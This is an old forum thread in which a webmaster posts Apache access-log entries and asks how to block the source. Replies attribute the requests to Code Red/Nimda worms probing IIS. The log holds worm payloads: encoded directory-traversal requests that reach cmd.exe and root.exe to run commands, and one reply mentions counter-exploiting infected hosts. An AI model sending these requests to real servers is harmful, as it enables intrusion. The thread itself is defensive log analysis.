-
December 1st, 2002, 07:37 PM
#1
apache access.log
So... ah... from the strings I see here from my access log... I'm guessing this was either some skiddie trying to get in or... maybe a virus trying to spread itself... is that an accurate assumption or...?
66.128.109.148 - - [27/Nov/2002:23:20:22 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 278 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:22 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 276 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:23 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:23 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:24 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:24 -0600] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:25 -0600] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:26 -0600] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:26 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:26 -0600] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:27 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:27 -0600] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:27 -0600] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:28 -0600] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:28 -0600] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:29 -0600] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300 "-" "-"
And is there a way for me to make apache just deny any requests from this other machine? I've found quite a few more and I think another host is actually doing this same routine as we speak.
-
December 1st, 2002, 07:49 PM
#2
Looks VERY much like Nimda/Code red
-
December 1st, 2002, 07:53 PM
#3
yeah its like... i figured it couldnt be a real human hack attempt cause of the rate of the URL requests or whatever... theres like two per second sometimes.
Analog = Classical
Digital = Techno
-
December 1st, 2002, 08:55 PM
#4
Junior Member
That's probably one of the Internet worms looking for an unpatched IIS server (Commonly Code Red). If you use UNIX, you don't have to worry about these log entries as they don't affect Apache, if you use Windows, make sure you are fully patched.
I have the following lines at the end of my .htaccess file:
-
December 1st, 2002, 09:33 PM
#5
Just for fun, grep | wc -l your access_log and error_log for "cmd.exe" and see how many log entries there are for such IIS hack attempts: it's mind boggling!
On a low traffic apache server at work, I get 2712 hits for cmd.exe (log starts june 14)!!
Ammo
Credit travels up, blame travels down -- The Boss
-
December 2nd, 2002, 01:37 AM
#6
Im running it on an XP machine... its just going to be up for a while to test a website so this client can look at it but... man... I am really surprised how often this is going... its crazy to see how many times my machine gets hit with that... I thought code red and the like were all but gone! Guess not!
Analog = Classical
Digital = Techno
-
December 2nd, 2002, 02:09 PM
#7
propably someone infected with as stated before, the code-red or nimda virus..
the funny thing is, you can use this against them..
When I was a mere scriptkiddie, I would search my logs for these and the fact is, if they have this worm, they can also be exploited via the unicode bug
Not that any of us would ever do so.. so you can mail the man/woman behind the IP and tell them theyve got a serious problem..
Linux: don't be part of the probelem, be part of the solution..
ASCII stupid question, get a stupid ANSI.
When in Russia, pet a PETSCII.
Get your ass over to SLAYRadio the best station for C64 Remixes !
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|